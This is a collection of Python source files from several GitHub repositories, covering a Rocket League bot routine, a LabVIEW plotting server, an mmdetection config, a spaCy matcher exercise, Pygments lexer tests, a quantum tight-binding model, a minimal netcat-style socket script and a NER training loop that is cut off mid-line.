Dataset columns (per-row fields, with min/max stats):
- max_stars_repo_path: string, length 4 to 197
- max_stars_repo_name: string, length 6 to 120
- max_stars_count: int64, 0 to 191k
- id: string, length 1 to 8
- content: string, length 6 to 964k
- score: float64, -0.88 to 3.95
- int_score: int64, 0 to 4
src/routines/base_routine.py
Impossibum/SARPBC
1
12758955
<reponame>Impossibum/SARPBC
from rlbot.utils.structures.bot_input_struct import PlayerInput
from rlbot.utils.structures.game_data_struct import GameTickPacket

import utils.car as car_module
import utils.game_data as game_data


# Medium-long term task which may include maneuvers or even other routines!
class BaseRoutine:
    def __init__(self, car: car_module.Car, gd: game_data.GameData) -> None:
        self.car = car
        self.finished = False
        self.controls = PlayerInput()
        self.maneuver = None
        self.routine = None
        self.gd = gd

    def update(self) -> PlayerInput:
        if self.maneuver and not self.maneuver.finished:
            return self.maneuver.update(self)
        elif self.routine and not self.routine.finished:
            return self.routine.update(self)
        else:
            return self.controls
1.875
2
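For illustration, a minimal sketch of how a concrete routine might subclass BaseRoutine above; the WaitRoutine name and the frame-count logic are illustrative assumptions, not code from the SARPBC repo, and the import assumes the repo's src/ directory is on the path.

from routines.base_routine import BaseRoutine


class WaitRoutine(BaseRoutine):
    """Do nothing for a fixed number of update() calls, then mark itself finished."""

    def __init__(self, car, gd, frames: int = 120) -> None:
        super().__init__(car, gd)
        self.frames_left = frames

    def update(self):
        self.frames_left -= 1
        if self.frames_left <= 0:
            self.finished = True
        # Fall back to BaseRoutine's maneuver/routine handling (returns self.controls here).
        return super().update()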
python/plotserv/api_core.py
advancedplotting/aplot
10
12759083
<reponame>advancedplotting/aplot # Copyright (c) 2014-2015, Heliosphere Research LLC # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from this # software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from matplotlib import pyplot as plt from cStringIO import StringIO from PIL import Image import numpy as np import os.path as op import time from .terminals import remove_none from .core import resource from . import errors @resource('init') def init(ctx, a): """ No-op for Init.vi """ pass @resource('new') def new(ctx, a): """ Create a new figure, and initialize the axes. Returns a string integer with the new plot ID. 
""" import random PLOT_TYPES = {0: 'rect', 1: 'polar'} SCALES = {0: 'linear', 1: 'linear', 2: 'log', 3: 'symlog'} kind = a.enum('kind', PLOT_TYPES) xscale = a.enum('xscale', SCALES) yscale = a.enum('yscale', SCALES) bgcolor = a.color('bgcolor') axiscolor = a.color('axiscolor') left = a.float('left') right = a.float('right') top = a.float('top') bottom = a.float('bottom') aspect = a.float('aspect') # Check polar arguments for consistency if kind == 'polar' and xscale != 'linear': raise errors.LogNotSupported("Polar plots support only linear scales for X") # Right/top default margins are smaller as there are no labels left = left if left is not None else 0.12 bottom = bottom if bottom is not None else 0.12 right = right if right is not None else 0.10 top = top if top is not None else 0.10 width = (1.-left-right) height = (1.-bottom-top) # Catch reversed margins if width < 0: width = -1*width left = right if height < 0: height = -1*width bottom = top if aspect <= 0: aspect = None k = { 'axisbg': axiscolor, 'polar': kind == 'polar', 'aspect': aspect, } remove_none(k) plotid = random.randint(1,2**30) f = ctx.new(plotid) ctx.polar = (kind == 'polar') plt.axes((left, bottom, width, height), **k) if bgcolor is not None: f.set_facecolor(bgcolor) else: f.set_facecolor('w') # Manually setting the scale to linear screws up the default axis range if xscale != 'linear': plt.xscale(xscale)#, nonposx='clip') if yscale != 'linear': plt.yscale(yscale)#, nonposy='clip') ctx.xscale = xscale ctx.yscale = yscale return str(plotid) @resource('close') def close(ctx, a): """ Close a Plot ID, ignoring any error. """ plotid = a.plotid() try: ctx.set(plotid) ctx.close() except Exception: pass @resource('isvalid') def isvalid(ctx, a): """ Test if an identifier is known. Returns a string '1' if valid, '0' otherwise. """ plotid = a.plotid() return "%d" % (1 if ctx.isvalid(plotid) else 0) @resource('view') def view(ctx, a): """ Represents View.vi, optimized for rendering to a Picture.""" plotid = a.plotid() f = ctx.set(plotid) sio = StringIO() # Step 1: Save the figure to a raw RGBA buffer plt.savefig(sio, format='rgba', dpi=f.get_dpi(), facecolor=f.get_facecolor()) sio.seek(0) # Step 2: Import the image into PIL xsize, ysize = f.canvas.get_width_height() img = Image.fromstring("RGBA", (xsize, ysize), sio.read()) sio.close() # Step 3: Process the alpha channel out img.load() newimg = Image.new('RGB', img.size, (255, 255, 255)) newimg.paste(img, mask=img.split()[3]) # Step 4: Generate ARGB buffer (in little-endian format) r, g, b = tuple(np.fromstring(x.tostring(), dtype='u1') for x in newimg.split()) a = np.empty((xsize*ysize,4), dtype='u1') a[:,0] = b a[:,1] = g a[:,2] = r a[:,3] = 0 # Step 4: Return to LabVIEW, with size headers sio = StringIO() sio.write(np.array(ysize, 'u4').tostring()) sio.write(np.array(xsize, 'u4').tostring()) sio.write(a.tostring()) sio.seek(0) return sio.read() @resource('save') def save(ctx, a): """ Represents Save.vi. 
""" EXTENSIONS = { '.pdf': 'pdf', '.png': 'png', '.bmp': 'bmp', '.tif': 'tiff', '.tiff': 'tiff', '.jpg': 'jpeg', '.jpeg': 'jpeg', '.gif': 'gif', } plotid = a.plotid() name = a.string('path') f = ctx.set(plotid) root, ext = op.splitext(name) ext = ext.lower() if len(ext) == 0: raise errors.UnrecognizedFileExtension('No file extension: "%s"' % name) if ext not in EXTENSIONS: raise errors.UnrecognizedFileExtension('Unknown file extension: "%s"' % ext) format = EXTENSIONS[ext] vector_formats = ('pdf',) sio = StringIO() # PDF doesn't need further processing by PIL, # so we can short-circuit and return here. if format in vector_formats: plt.savefig(sio, format=format) sio.seek(0) return sio.read() # Step 1: Save the figure to a raw RGBA buffer plt.savefig(sio, format='rgba', dpi=f.get_dpi(), facecolor=f.get_facecolor()) sio.seek(0) # Step 2: Import the image into PIL xsize, ysize = f.canvas.get_width_height() img = Image.fromstring("RGBA", (xsize, ysize), sio.read()) # Step 3: Process the alpha channel out img.load() newimg = Image.new('RGB', img.size, (255, 255, 255)) newimg.paste(img, mask=img.split()[3]) img = newimg # Step 4: Export from PIL to the destination format sio = StringIO() img.save(sio, format=format) sio.seek(0) return sio.read()
1.773438
2
configs/mask_rcnn/mask_rcnn_se_x101_64x4d_fpn_mstrain_1x_coco.py
tianchiVideoSeg/mmdetection
1
12759211
<reponame>tianchiVideoSeg/mmdetection<gh_stars>1-10
_base_ = [
    '../_base_/models/mask_rcnn_se_r50_fpn.py',
    '../_base_/datasets/coco_instance.py',
    '../_base_/schedules/schedule_1x.py',
    '../_base_/default_runtime.py'
]
model = dict(
    pretrained='checkpoints/se_resnext101_64x4d-f9926f93.pth',
    backbone=dict(block='SEResNeXtBottleneck', layers=[3, 4, 23, 3], groups=64))
0.992188
1
util/utilities.py
umbertov/SpicyArbs
0
12759339
""" Utility functions go here. SpiceBucks """ # ------------------------------------------------------------------ import sys import numpy as np from util.message import message # ------------------------------------------------------------------ # ----------------------------------------------------------------------------------------- # system functions # ----------------------------------------z------------------------------------------------- def exit(code): """ Exit the program, 0 is failure, 1 is success. """ if not isinstance(code, int): message.logError("Exit code must be an interger.") exit(0) if code == 0: message.logError("Exiting program with failure status.") elif code == 1: message.logDebug("Exiting program with success status.") else: message.logError( "Exiting program with unknown error status (" + str(code) + ")" ) sys.exit()
1.710938
2
examples/futaba/futaba_burst_target_positions.py
karakuri-products/gs2d-python
7
12759467
<reponame>karakuri-products/gs2d-python
#! /usr/bin/env python3
# encoding: utf-8

import sys
import time
import logging

sys.path.insert(0, '../..')

from gs2d import SerialInterface, Futaba

# Logging setup
logging.basicConfig()
logging.getLogger('gs2d').setLevel(level=logging.DEBUG)

try:
    # Initialization
    si = SerialInterface()
    futaba = Futaba(si)

    # Burst torque ON
    # enable: 1
    sid_data = {
        1: [1]
    }

    # Length: number of bytes of data (VID + Data) for a single servo.
    # Length = VID(1) + Data(1) = 2
    futaba.burst_write(Futaba.ADDR_TORQUE_ENABLE, 2, sid_data)

    # Burst-set a series of target angles
    for position_degree in [0, 50, 0, -50, 0]:
        # Burst position setting
        sid_positions = {
            # servo ID: position
            1: position_degree
        }
        futaba.set_burst_target_positions(sid_positions)

        # Wait one second
        time.sleep(1.0)

    # Close
    futaba.close()
    si.close()
except Exception as e:
    print('Error', e)
1.578125
2
abintb/qn.py
abyellow/abin-tight-binding
1
12759595
<reponame>abyellow/abin-tight-binding<gh_stars>1-10 import numpy as np from scipy.linalg import expm import matplotlib.pyplot as plt from time import time class QnModel: """ Initial data/conditions of Quantum Hamiltonian and initial states. """ def __init__(self, QnIni, tb_model=False): self.QnIni = QnIni self.k = QnIni.k self.ctrlt = QnIni.ctrlt #np.array(ctrlt) #initial control/laser self.H0 = QnIni.H0 #Hamiltonian with no control/laser self.Hctrl = QnIni.ham_t()#np.array(Hctrlt) #Hamiltonian of control/laser term self.phi_i = QnIni.phi_i() #initial quantum states self.dt = QnIni.dt #time step size self.tb_model = tb_model self.dim = np.shape(self.H0)[0] #dimension of Hamiltonian self.t_ini = 0. #start time self.tim_all = np.shape(self.Hctrl)[0] #time length of ctrl/laser self.real_tim = np.array(range(self.tim_all+1)) * self.dt +\ self.t_ini #real time of time length self.pau_i = np.array([[1,0],[0,1]]) def u_dt(self, H, tim): """propagator of dt time""" if self.tb_model: #cond = QnIni(k=self.k,ctrlt=self.ctrlt) dx,dy,dz = self.QnIni.dvec(self.ctrlt[tim]) d = np.sqrt(dx**2 + dy**2 + dz**2)*self.dt u = np.cos(d)*self.pau_i -1j*self.dt/d*np.sin(d)*H else: u = expm(-1j*H*self.dt) return u def u_t(self): """Evolve propergator for given time period""" dim = self.dim tim_all = self.tim_all #ctrl = self.ctrl H0 = self.H0 Hctrl = self.Hctrl u_all = np.zeros((tim_all+1,dim,dim),dtype = complex) u_all[0,:,:] = np.eye(dim) for tim in xrange(tim_all): H = H0 + Hctrl[tim]#np.matrix( ctrl[i,tim] * np.array(Hctrl[i])) u_all[tim+1,:,:] = np.dot(self.u_dt(H,tim), u_all[tim,:,:]) return u_all def phi_t(self): """Evolve state for given time period""" dim = self.dim tim_all = self.tim_all phi_all = np.zeros((tim_all+1,dim,1),dtype = complex) phi_all[0,:,:] = self.phi_i[:] u_all = self.u_t() for tim in xrange(tim_all): phi_all[tim+1,:,:] = np.dot(u_all[tim+1,:,:], phi_all[0,:,:]) return phi_all def prob_t(self,phi): """probability in time""" return np.real(phi*np.conjugate(phi)) class QnIni: def __init__(self, k, ctrlt, dt = .1, tau=1.,deltau=.5, ham_val=0,state='mix'): self.dt = dt self.k = k self.ctrlt = np.array(ctrlt) self.ham_val = ham_val self.tau = tau self.deltau = deltau self.state = state self.H0 = np.zeros((2,2)) self.save_name = 'save_name' def dvec(self,ctrl): k = self.k tau = self.tau deltau = self.deltau #+ ctrlt val = self.ham_val if val == 0: dx = tau+deltau + (tau-deltau) * np.cos(k-ctrl) dy = (tau-deltau) * np.sin(k-ctrl) dz = 0 elif val == 1: deltau = -deltau dx = tau+deltau + (tau-deltau) * np.cos(k-ctrl) dy = (tau-deltau) * np.sin(k-ctrl) dz = 0 elif val == 2: dx = 0.#self.tau/2. dy = 0.#(self.tau-deltau) * np.sin(k-A) dz = tau * np.cos(k-ctrl) elif val == 3: dx = self.tau/2. dy = 0.#(self.tau-deltau) * np.sin(k-A) #dz = (tau+ctrlt) * np.cos(k) dz = tau * np.cos(k-ctrl) elif val == 4: dx = tau+deltau + (tau-deltau) * np.cos(k[0]-ctrl) dy = (tau-deltau) * np.sin(k[1]-ctrl) dz = 0 return dx,dy,dz def ham(self,ctrl): pau_x = np.array([[0,1],[1,0]]) pau_y = np.array([[0,-1j],[1j,0]]) pau_z = np.array([[1,0],[0,-1]]) pau_i = np.array([[1,0],[0,1]]) dx,dy,dz = self.dvec(ctrl) return pau_x * dx + pau_y * dy + pau_z * dz def ham_t(self): ctrlt = self.ctrlt return np.array(map(self.ham,ctrlt)) def phi_i(self): state = self.state w,v = np.linalg.eigh(self.ham(ctrl=0)) if state == 'mix': return ((v[:,0]+v[:,1])/np.sqrt(2)).reshape(len(v[:,0]),1) elif state == 'down': return v[:,0].reshape(len(v[:,0]),1) elif state == 'up': return v[:,1].reshape(len(v[:,1]),1) else: print 'no such state!!' 
def eig_energy(self,ctrl=0): w, v = np.linalg.eigh(self.ham(ctrl)) return w if __name__ == "__main__": dt = .01 E0 = 1. knum = 100 freq = 1. tau = 1. deltau = .5#-.3 #phi_ini = [[1],[0]] n_tot = 4000 t_rel = (np.array(range(n_tot-1))-2000)*dt ctrli = E0 * np.cos(freq*t_rel) ki =[ 0.001 ,np.pi] #ki = 0.001 ti = time() cond1 = QnIni(k=ki, ctrlt=ctrli,ham_val = 4) #phi_i = cond1.phi_i() #Hctrl = cond1.ham_t() #print Hctrl.shape #H0 = np.zeros((2,2)) model1 = QnModel(cond1) phit = model1.phi_t() probt = model1.prob_t(phit) print 'run_time: ', time() - ti plt.plot(t_rel,probt[:-1,0,:]) plt.plot(t_rel,probt[:-1,1,:]) plt.show()
1.976563
2
spacewalk14.py
Benniah/Space-Exploration-NLP
0
12759723
#!/usr/bin/python """ DEBUGGING PATTERNS Both patterns in this exercise contain mistakes and won’t match as expected. Can you fix them? If you get stuck, try printing the tokens in the doc to see how the text will be split and adjust the pattern so that each dictionary represents one token. """ # Edit pattern1 so that it correctly matches all case-insensitive mentions # of "Amazon" plus a title-cased proper noun. # Edit pattern2 so that it correctly matches all case-insensitive mentions # of "ad-free", plus the following noun. import spacy from spacy.matcher import Matcher nlp = spacy.load("en_core_web_sm") doc = nlp( "Twitch Prime, the perks program for Amazon Prime members offering free " "loot, games and other benefits, is ditching one of its best features: " "ad-free viewing. According to an email sent out to Amazon Prime members " "today, ad-free viewing will no longer be included as a part of Twitch " "Prime for new members, beginning on September 14. However, members with " "existing annual subscriptions will be able to continue to enjoy ad-free " "viewing until their subscription comes up for renewal. Those with " "monthly subscriptions will have access to ad-free viewing until October 15." ) # Create the match patterns pattern1 = [{"LOWER": "amazon"}, {"IS_TITLE": True, "POS": "PROPN"}] pattern2 = [{"LOWER": "ad"}, {"TEXT": "-"}, {"LOWER": "free"}, {"POS": "NOUN"}] # Initialize the Matcher and add the patterns matcher = Matcher(nlp.vocab) matcher.add("PATTERN1", None, pattern1) matcher.add("PATTERN2", None, pattern2) # Iterate over the matches for match_id, start, end in matcher(doc): # Print pattern string name and text of matched span print(doc.vocab.strings[match_id], doc[start:end].text)
2.65625
3
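Since the docstring above recommends printing tokens when a pattern misbehaves, here is a minimal sketch of that check for the hyphenated phrase; the exact tokenization and tags depend on the installed en_core_web_sm model, so treat the output as an assumption.

import spacy

nlp = spacy.load("en_core_web_sm")
# Inspect how the hyphenated "ad-free" is split into tokens
for token in nlp("Amazon Prime offers ad-free viewing."):
    print(token.text, token.pos_)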
tests/test_inherit.py
blu-base/pygments
1
12759851
<reponame>blu-base/pygments
"""
    Tests for inheritance in RegexLexer
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    :copyright: Copyright 2006-2022 by the Pygments team, see AUTHORS.
    :license: BSD, see LICENSE for details.
"""

from pygments.lexer import RegexLexer, inherit
from pygments.token import Text


class One(RegexLexer):
    tokens = {
        'root': [
            ('a', Text),
            ('b', Text),
        ],
    }


class Two(One):
    tokens = {
        'root': [
            ('x', Text),
            inherit,
            ('y', Text),
        ],
    }


class Three(Two):
    tokens = {
        'root': [
            ('i', Text),
            inherit,
            ('j', Text),
        ],
    }


class Beginning(Two):
    tokens = {
        'root': [
            inherit,
            ('m', Text),
        ],
    }


class End(Two):
    tokens = {
        'root': [
            ('m', Text),
            inherit,
        ],
    }


class Empty(One):
    tokens = {}


class Skipped(Empty):
    tokens = {
        'root': [
            ('x', Text),
            inherit,
            ('y', Text),
        ],
    }


def test_single_inheritance_position():
    t = Two()
    pats = [x[0].__self__.pattern for x in t._tokens['root']]
    assert ['x', 'a', 'b', 'y'] == pats


def test_multi_inheritance_beginning():
    t = Beginning()
    pats = [x[0].__self__.pattern for x in t._tokens['root']]
    assert ['x', 'a', 'b', 'y', 'm'] == pats


def test_multi_inheritance_end():
    t = End()
    pats = [x[0].__self__.pattern for x in t._tokens['root']]
    assert ['m', 'x', 'a', 'b', 'y'] == pats


def test_multi_inheritance_position():
    t = Three()
    pats = [x[0].__self__.pattern for x in t._tokens['root']]
    assert ['i', 'x', 'a', 'b', 'y', 'j'] == pats


def test_single_inheritance_with_skip():
    t = Skipped()
    pats = [x[0].__self__.pattern for x in t._tokens['root']]
    assert ['x', 'a', 'b', 'y'] == pats
1.820313
2
int.p4app/nc.py
baru64/int-p4
3
12759979
# simple netcat in python2
import sys
import socket


def netcat(host, port, is_server):
    if is_server:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((host, port))
        s.listen(1)
        conn, _ = s.accept()
        while True:
            data = conn.recv(1024)
            if not data:
                break
            print data
        conn.close()
    else:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        while True:
            data = raw_input()
            if not data:
                break
            s.sendall(data)
        s.close()


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print """usage\t\t nc.py TYPE HOST PORT
        TYPE - 'c' for client, 'l' for server"""
    else:
        if sys.argv[1] == 'c':
            netcat(sys.argv[2], int(sys.argv[3]), False)
        elif sys.argv[1] == 'l':
            netcat(sys.argv[2], int(sys.argv[3]), True)
        else:
            print "Bad option. Use 'l' or 'c'."
2.0625
2
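For a quick check of the listener mode above, a minimal standard-library client sketch; the address and port are arbitrary assumptions and should match whatever was passed to nc.py (e.g. a listener started with "nc.py l 127.0.0.1 9000").

import socket

# Connect to the running listener and send one line for it to print
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("127.0.0.1", 9000))
client.sendall(b"hello from the test client\n")
client.close()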
src/agreement/predicate_mention.py
hitzkrieg/Okr-Test
0
12760107
<gh_stars>0 """ Author: <NAME> and <NAME> Receives two annotated graphs and computes the agreement on the predicate mentions. We average the accuracy of the two annotators, each computed while taking the other as a gold reference. """ import sys sys.path.append('../common') from mention_common import * from constants import NULL_VALUE from filter_propositions import filter_verbal, filter_non_verbal from collections import defaultdict def compute_predicate_mention_agreement(graph1, graph2): """ Compute predicate mention agreement on two graphs :param graph1: the first annotator's graph :param graph2: the second annotator's graph :return predicate mention accuracy and the consensual graphs """ # Get the consensual mentions and the mentions in each graph consensual_mentions, graph1_prop_mentions, graph2_prop_mentions = extract_consensual_mentions(graph1, graph2) # Compute the accuracy, each time taking one annotator as the gold accuracy1 = len(consensual_mentions) * 1.0 / len(graph1_prop_mentions) if len(graph1_prop_mentions) > 0 else 0.0 accuracy2 = len(consensual_mentions) * 1.0 / len(graph2_prop_mentions) if len(graph1_prop_mentions) > 0 else 0.0 prop_mention_acc = (accuracy1 + accuracy2) / 2 consensual_graph1 = filter_mentions(graph1, consensual_mentions) consensual_graph2 = filter_mentions(graph2, consensual_mentions) return prop_mention_acc, consensual_graph1, consensual_graph2 def compute_predicate_mention_agreement_verbal(graph1, graph2): """ Compute predicate mention agreement only on verbal predicates :param graph1: the first annotator's graph :param graph2: the second annotator's graph :return predicate mention accuracy on verbal predicates """ verbal_graph1 = filter_verbal(graph1) verbal_graph2 = filter_verbal(graph2) accuracy, _, _ = compute_predicate_mention_agreement(verbal_graph1, verbal_graph2) return accuracy def compute_predicate_mention_agreement_non_verbal(graph1, graph2): """ Compute predicate mention agreement only on non verbal predicates :param graph1: the first annotator's graph :param graph2: the second annotator's graph :return predicate mention accuracy on non verbal predicates """ non_verbal_graph1 = filter_non_verbal(graph1) non_verbal_graph2 = filter_non_verbal(graph2) accuracy, _, _ = compute_predicate_mention_agreement(non_verbal_graph1, non_verbal_graph2) return accuracy def filter_mentions(graph, consensual_mentions): """ Remove mentions that are not consensual :param graph: the original graph :param consensual_mentions: the mentions that both annotators agreed on :return: the graph, containing only the consensual mentions """ consensual_graph = graph.clone() for prop in consensual_graph.propositions.values(): prop.mentions = { id : mention for id, mention in prop.mentions.iteritems() if str(mention) in consensual_mentions} # Remove them also from the entailment graph if prop.entailment_graph != NULL_VALUE: prop.entailment_graph.mentions_graph = [(m1, m2) for (m1, m2) in prop.entailment_graph.mentions_graph if m1 in consensual_mentions and m2 in consensual_mentions] # Remove propositions with no mentions if len(prop.mentions) == 0: consensual_graph.propositions.pop(prop.id, None) return consensual_graph def extract_consensual_mentions(graph1, graph2): """ Receives two graphs, and returns the consensual predicate mentions, and the predicate mentions in each graph. 
:param graph1: the first annotator's graph :param graph2: the second annotator's graph :return the consensual predicate mentions, and the predicate mentions in each graph """ # Get the predicate mentions in both graphs graph1_prop_mentions = set.union(*[set(map(str, prop.mentions.values())) for prop in graph1.propositions.values()]) graph2_prop_mentions = set.union(*[set(map(str, prop.mentions.values())) for prop in graph2.propositions.values()]) # Exclude sentence that weren't annotated by both annotators common_sentences = set([x.split('[')[0] for x in graph1_prop_mentions]).intersection( set([x.split('[')[0] for x in graph2_prop_mentions])) graph1_prop_mentions = set([a for a in graph1_prop_mentions if a.split('[')[0] in common_sentences]) graph2_prop_mentions = set([a for a in graph2_prop_mentions if a.split('[')[0] in common_sentences]) # Exclude ignored words # TODO: Rachel - document ignored words if not graph2.ignored_indices == None: graph1_prop_mentions = set([a for a in graph1_prop_mentions if len(overlap_set(a, graph2.ignored_indices)) == 0]) if not graph1.ignored_indices == None: graph2_prop_mentions = set([a for a in graph2_prop_mentions if len(overlap_set(a, graph1.ignored_indices)) == 0]) # Compute the accuracy, each time treating a different annotator as the gold consensual_mentions = graph1_prop_mentions.intersection(graph2_prop_mentions) return consensual_mentions, graph1_prop_mentions, graph2_prop_mentions def argument_mention_to_terms(mention, sentence): """ Receives the argument mention and the sentence(list of tokens), and returns the string associated with the argument mention. :param mention: the Argument mention :param sentence: the list of tokens of string representing the sentence """ terms = ' '.join([sentence[int(id)] for id in str(mention).rstrip(']').split('[')[1].split(', ') ]) return terms def analyse_predicate_mentions_individually(graph1, graph2): """ Receives gold and pred graphs, and prints errors in predicate extraction. 
:param graph1: the gold graph :param graph2: the predicted graph :for now no returns """ # Extract the proposition mentions graph1_prop_mentions = set.union(*[set(map(str, prop.mentions.values())) for prop in graph1.propositions.values()]) graph2_prop_mentions = set.union(*[set(map(str, prop.mentions.values())) for prop in graph2.propositions.values()]) # List of the ids of Common sentences (as string) common_sentences = set([x.split('[')[0] for x in graph1_prop_mentions]).intersection(set([x.split('[')[0] for x in graph2_prop_mentions])) # classify mentions into categories consensual_mentions = graph1_prop_mentions.intersection(graph2_prop_mentions) predicted_mentions_but_not_in_gold = graph2_prop_mentions - graph1_prop_mentions gold_mentions_but_not_predicted = graph1_prop_mentions - graph2_prop_mentions # Predicates ignored in current evaluation scheme (because only common sentences are currently considered) ignored_gold_predicates = set([a for a in graph1_prop_mentions if a.split('[')[0] not in common_sentences]) ignored_pred_predicates = set([a for a in graph2_prop_mentions if a.split('[')[0] not in common_sentences]) # dict1 & dict2 (type dictionary) --> sentID: list of indices (each indices corresponds to a predicate mention) dict1 = defaultdict(list) dict2 = defaultdict(list) for a in gold_mentions_but_not_predicted: dict1[a.split('[')[0]].append(a.split('[')[1].rstrip(']').split(', ')) for a in predicted_mentions_but_not_in_gold: dict2[a.split('[')[0]].append(a.split('[')[1].rstrip(']').split(', ')) # matches: the number of examples where the predicted proposition is not there in gold, but shares some lexical overlap with the gold Propositions # match_pc: the precentage of overlap (in terms of number ofwords) # thresh: Minimum lexical overlap to record and print (may be used in further analysis) matches = 0 match_pc = 0.0 thresh = 0.0 for sentID in dict2.keys(): list1 = dict1[sentID] list2 = dict2[sentID] for j in list1: overlapped = False for i in list2: intersect = set(i).intersection(j) if len(intersect)!=0: matches+=1 lexical_overal_pc = len(intersect)/len(set(i).union(j)) if(lexical_overal_pc >= thresh): print(" \n------Example of Gold proposition which was missed by predicted (but there was some overlap) --------") sentence = graph1.sentences[int(sentID)] gold_prop_mention = graph1.prop_mentions_by_key[sentID+'['+', '.join(j)+']'] predicted_prop_mention = graph2.prop_mentions_by_key[sentID+'['+', '.join(i)+']'] print("Sentence: {}".format(' '.join(sentence))) print("Gold proposition: {}. Explicit: {}".format( ' '.join([sentence[int(index)] for index in j]) + '[' + ', '.join([argument_mention_to_terms(argument_mention, sentence) for argument_mention in gold_prop_mention.argument_mentions.values()]) + ']', gold_prop_mention.is_explicit ) ) # Arguments of predicted proposition not printed because info not available in code (from prop_ex) print("Predicted proposition: {}.".format( ' '.join([sentence[int(index)] for index in i] ) )) overlapped = True match_pc += lexical_overal_pc break if(overlapped==False): sentence = graph1.sentences[int(sentID)] gold_prop_mention = graph1.prop_mentions_by_key[sentID+'['+', '.join(j)+']'] print '\n-------Gold proposition which was completely missed (no overlap): ----------- ' print("Sentence: {}".format(' '.join(sentence))) print("Gold proposition: {}. 
Explicit: {}".format( ' '.join([sentence[int(index)] for index in j]) + '[' + ', '.join([argument_mention_to_terms(argument_mention, sentence) for argument_mention in gold_prop_mention.argument_mentions.values()]) + ']', gold_prop_mention.is_explicit ) ) if matches!=0: match_pc = match_pc/matches*100 print ('\nOther statistics:') print('No of consensual mentions: {}'.format(len(consensual_mentions))) print('No of predicted mentions not in gold: {}'.format(len(predicted_mentions_but_not_in_gold))) print('No of gold mentions but not in predicted: {}'.format(len(gold_mentions_but_not_predicted))) print('No of gold mentions which have been ignored from evaluation: {}'.format(len(ignored_gold_predicates))) print('No of predicted mentions which have been ignored from evaluation: {}'.format(len(ignored_pred_predicates))) print('No of predicted mentions which have some intersection with the unmatched gold predicates: {}'.format(matches)) print('*******************\n')
2.84375
3
Screen.py
ytyaru/Pygame.line.201707171836
0
12760235
<reponame>ytyaru/Pygame.line.201707171836
import pygame

class Screen:
    def __init__(self, width=320, height=240, color=[0,0,0]):
        self.__color = color
        self.__size = (width, height)
        self.__screen = pygame.display.set_mode(self.__size)

    @property
    def Screen(self): return self.__screen

    @property
    def Size(self): return self.__size

    @property
    def Color(self): return self.__color

    def Fill(self):
        self.__screen.fill(self.__color)
2.0625
2
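A minimal usage sketch for the wrapper above; the window size, color, and wait time are arbitrary choices, and pygame must be installed.

import pygame
from Screen import Screen

pygame.init()
screen = Screen(width=320, height=240, color=[30, 30, 30])
screen.Fill()                  # paint the background color
pygame.display.flip()          # push the frame to the window
pygame.time.wait(1000)         # keep the window visible for a second
pygame.quit()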
ner/train_utils.py
bestasoff/adynorm
1
12760363
<gh_stars>1-10 import logging import pickle from collections import defaultdict from tqdm import tqdm from .utils import clear_cuda_cache import torch import numpy as np from .ner import get_metrics logger = logging.getLogger(__name__) def train(model, optimizer, loader, accum_steps, device): model.train() losses_tr = [0] for i, batch in tqdm(enumerate(loader), total=len(loader)): input_ids = batch['input_ids'].to(device) attention_mask = batch['attention_mask'].to(device) labels = batch['labels'].to(device) outputs = model(input_ids, attention_mask=attention_mask, labels=labels) loss = outputs.loss / accum_steps losses_tr[-1] += loss.item() loss.backward() if (i + 1) % accum_steps == 0: optimizer.step() losses_tr.append(0) optimizer.zero_grad() clear_cuda_cache() return model, optimizer, np.mean(losses_tr) def val(model, loader, dataset, tokenizer, id2label, device): model.eval() losses_val = [] n = len(loader) with torch.no_grad(): for batch in tqdm(loader, total=n): input_ids = batch['input_ids'].to(device) attention_mask = batch['attention_mask'].to(device) labels = batch['labels'].to(device) outputs = model(input_ids, attention_mask=attention_mask, labels=labels) loss = outputs.loss losses_val.append(loss.item()) metrics = get_metrics(model, tokenizer, device, loader, dataset, id2label) return np.mean(losses_val), metrics def learning_loop( model, num_epochs, optimizer, scheduler, train_dataloader, val_dataloader, val_dataset, tokenizer, accum_steps, id2label, device, save_model_steps=10, save_losses: str = None, save_metrics: str = None): losses = {'train': [], 'val': []} val_metrics = {'precision': [], 'recall': [], 'f1': []} logger.info(f"*** Learning loop ***") for epoch in range(1, num_epochs + 1): clear_cuda_cache() logger.info(f"*** Train epoch #{epoch} started ***") model, optimizer, loss = train(model, optimizer, train_dataloader, accum_steps, device) losses['train'].append(loss) logger.info(f"*** Train epoch #{epoch} loss *** = {loss}") # if scheduler: # scheduler.step() if val_dataloader is not None: logger.info(f"*** Validation epoch #{epoch} started ***") loss, metrics = val(model, val_dataloader, val_dataset, tokenizer, id2label, device) for k, i in metrics.items(): val_metrics[k].append(i) losses['val'].append(loss) logger.info( f"*** Validation epoch #{epoch} results ***\nloss = {loss},\nprecision = {metrics['precision']},\nrecall = {metrics['recall']},\nf1 = {metrics['f1']}") if (epoch + 1) % save_model_steps == 0: torch.save(model.state_dict(), 